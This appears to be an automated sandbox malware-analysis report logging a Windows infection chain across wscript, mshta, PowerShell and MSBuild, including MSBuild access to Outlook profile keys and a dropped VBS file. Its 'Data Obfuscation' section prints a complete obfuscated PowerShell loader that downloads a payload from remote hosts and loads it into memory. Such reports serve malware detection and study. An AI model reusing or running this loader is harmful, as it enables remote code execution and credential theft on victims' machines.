Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. 
source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdn
lib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdbimage_debug_directory source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp

                        Data Obfuscation

                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bg
Bn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::From
                        Source: C:\Windows\SysWOW64\wscript.exe Code function: 3_2_058DD624 push eax; iretd 3_2_058DD625
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00C3A2CC pushfd ; ret 5_2_00C3A2CE
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00C37561 push 8B09614Eh; iretd 5_2_00C37566
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00C31CFB pushad ; retf 5_2_00C31D7A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00C31DCB pushad ; retf 5_2_00C31DEA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00C31D8B pushad ; retf 5_2_00C31D9A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00C31D9B pushad ; retf 5_2_00C31DAA

                        Persistence and Installation Behavior

                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Temp\octupole.vbsJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
